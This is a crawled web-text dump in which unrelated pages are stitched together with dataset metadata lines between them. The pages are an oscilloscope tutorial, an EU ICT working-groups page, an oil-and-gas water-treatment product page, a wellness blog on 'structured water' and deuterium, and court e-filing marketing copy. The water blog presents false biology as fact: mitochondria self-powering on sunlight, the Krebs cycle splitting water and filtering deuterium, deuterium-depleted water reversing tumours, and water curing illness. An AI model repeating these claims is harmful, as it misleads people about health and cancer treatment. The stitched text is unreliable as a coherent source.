This tutorial will explain some features that are slightly more advanced and may be available only on digital oscilloscopes (more properly known as digital storage oscilloscopes, or DSOs). Our two previous tutorials have described basic concepts and setup procedures, which will help build a solid foundation for the lessons in this tutorial. Most oscilloscopes today are digital, meaning that they take rapid samples of an analog voltage and digitize the samples for manipulation and storage. This processing is done internally in benchtop and handheld oscilloscopes, while a USB oscilloscope typically offloads the task to a desktop or laptop computer. The conversion of voltage samples into numbers that can be stored in memory is done by an analog-digital converter (ADC). This is comparable to the process of digitizing music for an MP3 file or a compact disc. A typical moderately priced digital oscilloscope will use 8 bits (binary digits) to store 256 possible voltage values within the range selected by the user. Precision oscilloscopes may use 12 bits (4,096 values) or 16 bits (65,536 values) to store each voltage sample. The speed of converting and storing samples will be limited by processing power. A digital oscilloscope may allow you to set the frequency and bit depth manually, but if the processor is unable to reach the frequency requested by the user, it may draw straight lines between points on the screen or may link them with little curves calculated with a trigonometry function. This process of inferring missing data is known as interpolation. Figure 1 shows straight-line interpolation, beginning with an analog signal at the top, a rapidly sampled digital version with 20 voltage levels in the middle, and a slowly sampled version with only 5 voltage levels at the bottom. Figure 1: Straight-line interpolation Sampling rate is measured as MS/s (megasamples per second) or GS/s (gigasamples per second). The peak sampling rate quoted by a manufacturer may be attainable only when a single channel is in use; a second channel will almost double the processing requirements, and the sampling rate may diminish accordingly. Ideally the sampling rate of a digital oscilloscope should be about 10 times the highest signal frequency that you will be measuring. The most common type of oscilloscope probe has a little slide switch on its body, as shown in Figure 2. 1X is the normal position. The 10X position engages a resistor-capacitor combination inside the body of the probe which attenuates the measured voltage by a factor of 10. This allows you to measure voltages that are up to 10 times the usual limit for the oscilloscope. The higher resistance of a probe in its 10X setting also imposes less load on the circuit that you are testing, but you will lose accuracy at low voltages. Figure 2: 1X and 10X probe attenuation switch The default for most oscilloscopes is 10X attenuation, as it offers a balance of bandwidth and amplitude. 1X should be reserved for signals with low frequency and low voltages. Additionally, your oscilloscope may have a setting that allows you to specify probes with different characteristics, such as 100X for dealing with very high voltages. Almost all oscilloscopes have at least two channels, each of which can display a signal from a separate probe. This enables you to compare signals from more than one source. For example, suppose you have two 7555 timer chips wired in astable mode, and one of them modulates the signal from the other.
This can be done by taking the fluctuating voltage on the Threshold pin of the first chip and connecting it with the Control pin of the second chip. In Figure 3, the control voltage from the first chip is the blue triangular waveform while the square wave from the output of the second chip is red. You can see that when the control voltage increases, the frequency of the square wave decreases. Figure 3: The control voltage and output signal of a 7555 timer The two traces may also be displayed in a split screen, as in Figure 4. The VOLTS/DIV of each view can be adjusted separately, so that each trace fills its window. Figure 4: The control voltage and output voltage displayed on a split screen On a digital oscilloscope, the basic triggering capability that I described in "How to Use An Oscilloscope" (link above this article) will have additional variations. A simple edge trigger tells the oscilloscope to start capturing data either when the voltage rises up through a trigger threshold or drops down through it. A digital oscilloscope can be set to respond if either of these events occurs. Pulse-width triggering detects pulses that are either longer or shorter than specified. This is useful for sensing momentary timing inaccuracies in a repeating signal. A window trigger detects voltage entering or leaving a window that may be defined visually on the screen. Hysteresis can be specified to eliminate false positives caused by a noisy signal. This setting basically tells the oscilloscope, "When voltage rises through a lower threshold, wait until the voltage continues to rise through a higher threshold." In the hysteresis zone between these levels, the oscilloscope ignores small variations. If the voltage drops back below the lower threshold without ever reaching the higher threshold, the triggering operation is cancelled until the next rise through the lower threshold occurs. A hysteresis setting can also be used to sense a falling voltage that drops through a higher threshold followed by a lower threshold. You may also set pre-trigger time or post-trigger delay to determine the moment when the signal will be displayed before or after the triggering event. All of these trigger options may help to detect events such as voltage spikes that are brief, intermittent, and difficult to see. Any digital oscilloscope should be able to derive immediate numeric measurements from a trace or a segment of a trace. These measurements will include the frequency of a signal, its minimum and maximum voltage, its average voltage, and its RMS value. RMS is an acronym for root-mean-square, and is calculated by squaring each of a series of regularly spaced voltage measurements, finding the average of the squares, and then extracting the square root of the average. The result is equivalent in power to a DC voltage of the same value; thus 110V DC should cause an incandescent bulb to burn as brightly as 110V AC RMS, even though the AC signal will have higher peak values. Other features may be available in oscilloscopes, but they are less commonly used or more technical than the ones listed here.
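The RMS definition given above translates directly into a few lines of code. Here is a minimal Python version of exactly that procedure — square each sample, average the squares, take the square root — applied to a handful of made-up voltage samples:

```python
import math

def rms(samples):
    """Root-mean-square of regularly spaced voltage samples."""
    return math.sqrt(sum(v * v for v in samples) / len(samples))

# Eight evenly spaced samples of a 1 V-amplitude sine wave.
samples = [math.sin(2 * math.pi * k / 8) for k in range(8)]
print(rms(samples))  # ~0.707, i.e. amplitude / sqrt(2)
```

The 0.707 result matches the familiar rule that a sine wave's RMS value is its peak value divided by the square root of two, which is why 110V AC RMS delivers the same power as 110V DC even though the AC signal has higher peak values.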
systems_science
http://www.eeca-ict.eu/working_groups/&day=13&month=5&year=2012
2013-12-10T21:29:53
s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1386164026161/warc/CC-MAIN-20131204133346-00007-ip-10-33-133-15.ec2.internal.warc.gz
0.922552
280
CC-MAIN-2013-48
webtext-fineweb__CC-MAIN-2013-48__0__24968896
en
People and interaction between them are the key factors for scientific research, technological development and industrial applications progress. In order to strengthen the opportunities for interaction, the PICTURE team created three interconnected Working Groups. The objective of the Thematic Working Groups is to provide the project with strategic vision regarding the EU-EECA ICT collaboration in specific application and research domains, whilst connecting the project to the key relevant players both in Europe and in the EECA countries. The WGs will be open and will interact with each other, in order to benefit from mutual learning and exchange of experience. PICTURE project has created three thematic Working Groups: - Working Group on Policy Dialogue (WG1): WG1 deals with different policy related topics. - Working Group on Components, computing systems, and networks (WG2): WG2 covers the fields of a new generation of components and systems, advanced computing, software and services for the future internet. - Working Group on Content technologies and information management (WG3): WG3 deals with the areas of digital libraries; technology enhanced learning, intelligent information management, ICT for digital learning and creativity. The topics of the Working Groups were chosen according to the outcomes of previous relevant projects and to a voting procedure between PICTURE partners. Follow the links to find more information about the members of PICTURE Working Groups:
systems_science
https://www.kochseparation.com/markets/oil-gas/
2023-06-09T15:22:47
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224656737.96/warc/CC-MAIN-20230609132648-20230609162648-00751.warc.gz
0.918431
297
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__286381462
en
Oil & gas refineries and plants face a variety of obstacles in creating an efficient and cost-effective operation. KSS offers solutions to minimize contaminants and promote resource recovery to drive down operating costs and prolong equipment lifetime. Our amine purification solution effectively removes heat stable salts (HSS) for improved absorber performance, reduced equipment corrosion, and fewer amine purchases. The AmiPur® system features Recoflo® ion exchange technology to continuously remove HSS from the amine circuit, recycling purified amine back into the process. Heat Stable Salt Removal in Carbon Capture and Storage The AmiPur®-CCS system features Recoflo® ion exchange technology to continuously remove HSS from amine circuits in the removal/recovery of CO2 from gases, recycling purified amine back into the process. The oil & gas industry relies heavily on high-quality process water throughout its operations. Our pretreatment solutions include filtration and water softening of feed streams to steam generators and boilers to reduce oil and suspended solids content, providing significant improvements to downstream processes. Filtration & Softening Our products and systems reduce operating costs through efficient media or membrane filtration of process water and water softening to reduce salts, oils, and suspended solids.
systems_science
https://www.multiflora-herbs.com/blogs/news/water
2023-12-08T17:11:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100762.64/warc/CC-MAIN-20231208144732-20231208174732-00186.warc.gz
0.947861
2,866
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__44092238
en
Water: the liquid of life Water is one of the most unusual substances in existence. It is one of the only known compounds that is denser as a liquid than as a solid, essentially because it's a liquid crystal. Let me explain what I mean by this. Water is composed of two hydrogen atoms combined with an oxygen atom, like this H-O-H, with the bonds forming an angle of about 104.5 degrees. Oxygen has a much larger electron cloud than hydrogen, as hydrogen is actually the smallest element. Because of this, oxygen tends to pull the molecule's electrons closer to itself, basically creating a charge imbalance. This makes water a molecular dipole, with the oxygen being the negatively charged end, and the two hydrogen atoms being positively charged. We've all heard that like charges repel and opposites attract; the same rule applies to polar molecules. The weak electrostatic bonds that form between water molecules are known as "hydrogen bonds." On a large scale, the geometric organization based on water's polarity and bond geometry is known as the "hydrogen bond network." This is what makes water a liquid crystal. At high temperatures the hydrogen bonds are broken and water forms a gas, but at low temperatures water becomes either a liquid or a solid crystal. The geometry in ice crystals is based on the tetrahedral pyramid structure of low-energy hydrogen bonds. The hydrogen bond network gives water an even more interesting property, a fourth phase between solid and liquid. This is known as "structured water," or exclusion zone (EZ) water, and is essentially a more crystalline gel state of water. EZ water is created when water interacts with particular chemical materials (anything hydrophilic) or electromagnetic frequencies (specifically infrared light). In this phase, water molecules form a more solidified hydrogen bond connection, and their positive and negative poles are oriented so that all positively charged atoms face one direction and all negatively charged atoms face the other. Because like charges repel, this pushes anything positively charged out of this phase of water, and pools negative charge within it. This is where the name "exclusion zone" comes from. I recommend reading Gerald Pollack's book The Fourth Phase of Water for more in-depth info, or watch his TED talk on it here. Structured water plays a pivotal role in cellular and mitochondrial function. Cell membranes are very hydrophilic, as are protein structures. This gives cells the ability to structure water in and around them, and many structures in life seem to have evolved specifically for this purpose. As an example let's look at mitochondria. Mitochondria ideally produce most of their energy through a process called oxidative phosphorylation, which primarily requires a current of electrons running across the electron transport chain, and a stream of protons flowing through a proton pump. Mitochondria actually hold far more structured water than any other part of the cell, and they use it as a way to store electrons to keep the electron transport chain running, creating a gel-state water battery. If we look at how mitochondria are structured, they are completely filled with inter-folded inner membranes known as cristae. The cristae serve to maximize the amount of hydrophilic surface area touching the water inside mitochondria. This creates a huge increase in water structuring. I hope now you're starting to see why I find mitochondria the most fascinating component of life!
A cellular biologist named Gilbert Ling devised an early theory similar to what we know as water structuring today. Interestingly, he did so to explain how cells are able to balance sodium and potassium. Sodium and potassium work together to maintain water balance inside cells. With too much sodium present the cell will fill with water; with more potassium than sodium, the opposite occurs. Through natural osmosis the cell's sodium/water concentration becomes too high for normal cell functions to occur, including proper water structuring. In fact, one of the defining features of cancer cells is that their water content rises to as much as 90%! To prevent this, healthy cells use an ATP-dependent enzyme known as the sodium-potassium pump, which pushes sodium out in exchange for potassium going in. Now, we've elucidated the structure of this pump and we know it is used for this purpose, but Ling pointed out a problem: theoretically, the cell isn't able to produce enough energy to maintain this enzyme. In fact, based on standard biology the body can produce only about 1/3,000th of the ATP it needs to run this enzyme alone. Ling ran a number of experiments confirming this, which you can read about here. The theory that he devised to answer this problem was based around water. While Ling's theory isn't perfect, it does offer many insights into the role of water in cellular energy and electrolyte balance. He created what he called the "association-induction hypothesis," the earliest approximation of what we now know as water structuring. Ling believed that the main function of ATP wasn't to store energy at all, but to carry out its other lesser-known role, protein phosphorylation. ATP basically acts as a phosphate donor, and is used as a cofactor for a class of enzymes called kinases that modify protein structures. ATP unfolds proteins and as a result exposes the polar -NH and -CO groups at the ends of amino acids in the protein chains. These groups are hydrophilic and attract and orient water. We know this to be true today based on Pollack's research, but Ling predicted it decades ago! Looking at his and Pollack's work, I'm inclined to agree with Ling that perhaps ATP isn't the main "energy store" in the cell; perhaps instead it serves as a cofactor for water structuring. We know that EZ water acts as an electron sink, pooling electrons which then run through the electron transport chain to produce more ATP. Certainly, some of this ATP is broken apart to be used for energy, and some is used to alter protein structures, but what about the remaining energy needed to run the cell? If we look for other primary sources of cellular energy besides calories from food, there are a number of good candidates. One that I've been studying in depth myself is light. Now there are two sides to this: The first relies on what's called "charge separation." When sunlight hits water it raises its energy state, making it easier for the Krebs cycle to split water molecules into hydrogen and oxygen. This is actually the fundamental chemical reaction that allows plants to use sunlight during photosynthesis. The genius of mitochondria is that they invert this system. When sunlight hits water, through Einstein's photoelectric effect the light excites electrons while splitting water. The mitochondria use light as the external energy source. This creates a system that can regenerate its own energy stores indefinitely.
The infrared part of the sunlight spectrum contributes to the mitochondria's energy efficiency by creating more structured water. The infrared light can actually penetrate up to about 9 inches below the skin, so water structuring is enhanced in just about every cell in the body. This may be what gives the body enough ATP and EZ water to sustain its high energy requirement through the day. The other way the cell uses light is a bit more complex. It's something I've been studying more recently, but I'll explain what I've learned so far as best I can. When we look at a living system like a cell or a mitochondrion, the system is designed to do two things. First, it liberates stored energy from food, and second, it captures light energy from the environment. The stored energy comes from breaking apart molecules that other organisms (plants/animals) have created to contain energy, like fats or sugars. This is what most people think of when they think about where their body gets energy. These compounds act as electron stores and proton stores. These particles are separated out by glycolysis, beta-oxidation, and the Krebs cycle. Light energy is captured through the mechanism I mentioned previously, where light splits water into protons, electrons, and oxygen. Electrons are run through the electron transport chain, which pushes free protons out. The protons either flow back in through the proton pump, creating ATP, or are recycled back into water by the enzyme cytochrome c oxidase. In an ideal system, any energy used could be conserved and recycled. If this process were perfected, the cell would need no external input whatsoever. Mitochondria use specific interactions between water and protein structures to minimize energy loss. One example of this is the protein nanotubes that compose the cellular architecture. In his research, Pollack actually found that these nanotubes possess the ability to structure water. In the cell they absorb and channel light, and turn structured water into a proton and electron superconductor. They are made up primarily of semiconductors like collagen, and seem to serve as "wires" with the ability to transmit energy throughout the cell. This allows cells to synchronize reactions across a distance and create resonance between neighboring cells (read more here). Heat given off as infrared light by the mitochondria is used to maintain body temperature, but it has other roles as well. Infrared light not only structures water, which provides numerous benefits I've already covered, but also increases the temperature of water in and around the mitochondria, which actually causes it to structure more tightly. When it "shrinks" like this, it pulls the protein complexes in the electron transport chain closer together, preventing mitochondrial heteroplasmy (an aging-related process). Infrared light also stimulates various enzymes in the mitochondria, including cytochrome c oxidase. I've spent a lot of this article going over how water helps store and distribute energy throughout the cell and mitochondria, but there's another aspect of cellular water I want to cover before I wrap things up. This last part involves a hydrogen isotope known as deuterium. Hydrogen is the smallest atom, normally consisting of only one proton and one electron. However, there is a less common version of hydrogen with a different composition known as deuterium. Deuterium contains one proton, one electron, and one neutron.
Since electrons weigh next to nothing, this makes deuterium about double the weight of normal hydrogen. Even though deuterium is present only in small quantities compared to regular hydrogen, this difference in mass gives it quite a large impact on how mitochondria function. As I mentioned earlier, the hydrogen atoms in water (and sugars and fats) are broken apart to form individual protons and electrons, which are used to produce energy. When deuterium is present in place of hydrogen in water or other molecules, you can end up with a proton and neutron bound together where a single proton should be. When this happens, the heavier deuterium "proton" will dramatically slow the function of the electron transport chain or the proton pump, crashing oxidative phosphorylation. This happens due to something called the kinetic isotope effect. Many enzymes, including those in the electron transport chain, work by enhancing a process called proton tunneling, where protons have a probability of jumping from one place to another with little to no energy requirement. Deuterium blocks electron transport chain function because it has little to no ability to tunnel. All water contains deuterium to varying degrees. Sugars like glucose also contain deuterium and can be even more damaging, acting as a Trojan horse for deuterium to make its way into the mitochondria. Most people think the Krebs cycle is used just to make extra ATP; few realize it also serves a far more interesting purpose: it filters deuterium out of glucose and produces deuterium-depleted water. It does this by taking a glucose byproduct (pyruvate) and switching out its hydrogen atoms, swapping them with those in other molecules, which filters out the deuterium. In the process it also collects protons for use in oxidative phosphorylation, produces ATP, and funnels electrons into the electron transport chain. Defects in the Krebs cycle are strongly linked to cancer. This may actually be a result of impaired deuterium filtering crashing mitochondrial function. Defects in the water-recycling enzymes in the cycle (like fumarate hydratase) are associated with faster cancer metastasis and higher mortality. There have been a number of promising studies so far showing that deuterium-depleted water may help reverse tumor growth, though robust human research is still pending. Interestingly, grains, carbs, and processed foods are high in deuterium while fats are fairly low. Many of the benefits of diets like keto, or low-carb, may actually be a result of reduced deuterium intake. I hope this has given you a taste for the incredible role that water plays in the human body. Without water, life itself would not exist. One question I get a lot is, how much water should someone drink each day? The answer depends on the individual, so I recommend using a calculator like this one. I also recommend adding minerals to your water, as studies show this can enhance its absorption. You can use a pre-made electrolyte blend, or make your own at home using magnesium, potassium, and sea salt. Personally, I like to add inositol or a bit of lemon juice to taste. Dehydration is rampant in our modern environment, especially with frequent consumption of diuretics like alcohol, and with high levels of EMF, which disrupt water balance in cells.
There is also an excellent book documenting the remission of numerous health conditions using no medication other than a surplus of water. After reading this article, I'm sure you can see how that is possible. Now, go see for yourself.
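For readers who want a rough starting point for the "how much water per day" question raised above, the snippet below implements one common rule of thumb (roughly 30-35 ml per kilogram of body weight, nudged upward for exercise). This is a generic approximation, not the formula used by the calculator linked in the article, and individual needs vary:

```python
def daily_water_estimate_liters(weight_kg, exercise_minutes=0):
    """Rough daily water estimate: ~33 ml/kg plus ~0.35 L per 30 min of exercise."""
    base = weight_kg * 0.033            # liters from body weight alone
    activity = (exercise_minutes / 30) * 0.35
    return round(base + activity, 1)

print(daily_water_estimate_liters(70))      # ~2.3 L for a 70 kg adult at rest
print(daily_water_estimate_liters(70, 60))  # ~3.0 L with an hour of exercise
```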
systems_science
https://www.olis.com/
2016-10-24T06:53:45
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719542.42/warc/CC-MAIN-20161020183839-00504-ip-10-171-6-4.ec2.internal.warc.gz
0.92353
1,081
CC-MAIN-2016-44
webtext-fineweb__CC-MAIN-2016-44__0__251050235
en
formed in 1990, as a diversified software developer, applications services provider, and data operations center specializing in joint venture court system data and information management systems. Our focus is on electronic filing systems, court case management and document management systems, document imaging systems, subscription public access systems, and online and IVR electronic payment systems. ONE FULLY INTEGRATED SYSTEM, THAT WORKS! On-Line Information Services, Inc., has developed and successfully deployed a complete system in Alabama. Electronic filing (AlaFile™) Document imaging (AlaVault™) Online payment system (Alapay™) Subscription public access system (Alacourt.com™) This system is the first of its kind in the United States. On December 11, 2006, the State of Alabama became the first state to deploy a statewide "integrated" electronic filing system. The system, known as AlaFile™, allows voluntary electronic filing in all civil cases (including Small Claims, District and Circuit Courts, Domestic Relations and Child Support). AlaFile™ allows electronic filing and electronic service and notification and also provides full integration of electronically filed matters into the court's document management system (DMS) and into the clerks' and judges' case management system (CMS). The significant features of integration allow for the notification services and the new concept of Electronic Orders, which allow judges to create "2 click" instant orders in many cases. The AlaFile™ system was created out of financial necessity. In 2003, the Alabama court system suffered severe funding cutbacks, resulting in the layoff of approximately 1/3 of the employees of clerks' offices statewide, along with many other court staff. In late 2004, the Chief Justice of the Alabama Supreme Court, also tasked with the supervision of the state Administrative Office of Courts, recognized that technology represented the only possible hope for maintaining a functioning court system, and decreed that an e-filing system be created and deployed in 80% of all civil courts by the end of 2006. The key is to capitalize on this investment of time and money and move into the new age of court OLIS™ specializes in court technology integration. We implemented the first Integrated statewide E-filing system in the world, linking electronic filing from the lawyer' s computer, through the court' s case management system, to 2- click electronic orders generated at the Judge' s computer and automatically served upon all registered parties. The Document Management System (DMS) is the heart of E-Filing on the court side. Without a robust DMS, e-filed documents merely create an electronic "mountain" of unmanageable filings, not much better than the unmanageable "mountains" of paper you are trying to replace. OLIS™ incorporates its Imaging and Document Management System (USVault™), one of the most scalable and robust Document Imaging Systems available today. USVault™ was designed to handle one of the first statewide court imaging systems, and, after several years, sustains its growth at several million pages per month - without slowdown, and with affordable growth statistics. This was the "computerized court" of last century. The key is to capitalize on this investment of time and money and move into the new age of court technology. OLIS™ specializes in court technology integration. 
OLIS™ implemented the first Integrated statewide E-filing system in the world, linking electronic filing from the lawyer' s computer, through the court' s case management system, to 2- click electronic orders generated at the Judge' s computer and automatically served upon all registered parties. The system cannot work without the secure flow of money. OLIS™ includes the latest state-of-the-art Internet and Telephone IVR Payment systems handling credit ard and ACH payments. The system uses industry standard security measures. The entire system is operated in-house in its central operations center featuring redundant power systems (grid, natural gas generator, and gasoline backup generator) and redundant fiber high bandwidth Internet services (multiple provider over multiple fiber lines). This maximum control hands-on approach assures rapid payment clearing, accounting accuracy, and timely electronic transfer of funds to the court system bank accounts. Our approach is simple, yet quite unique. Users are willing to pay reasonable amounts for consistently high quality court data. OLIS™ pioneered subscription based Enhanced Public Access Systems to court records. This is how we got our start in 1990. Over the years, we have made our systems better and better. Ultimately, we developed the concept of E-Court Technology Partnerships with courts from which we were acquiring data. The realities of court funding proves that courts need assistance in creating high quality electronic court data. Unfortunately, only rarely are the courts provided with funding to implement state-of-the-art court technology. If the court forms a public/private partnership with a willing technology provider to implement state-of-the-art court technology, the implemented technology will provide an exponentially larger base of consistently high quality court data which the "partnership" can sell to willing subscribers, with the revenue paying for the system AND generating a revenue surplus! P.O. Box 8173 Mobile, AL 36693 Tel: 877-799-9898 / 251-344-3333
systems_science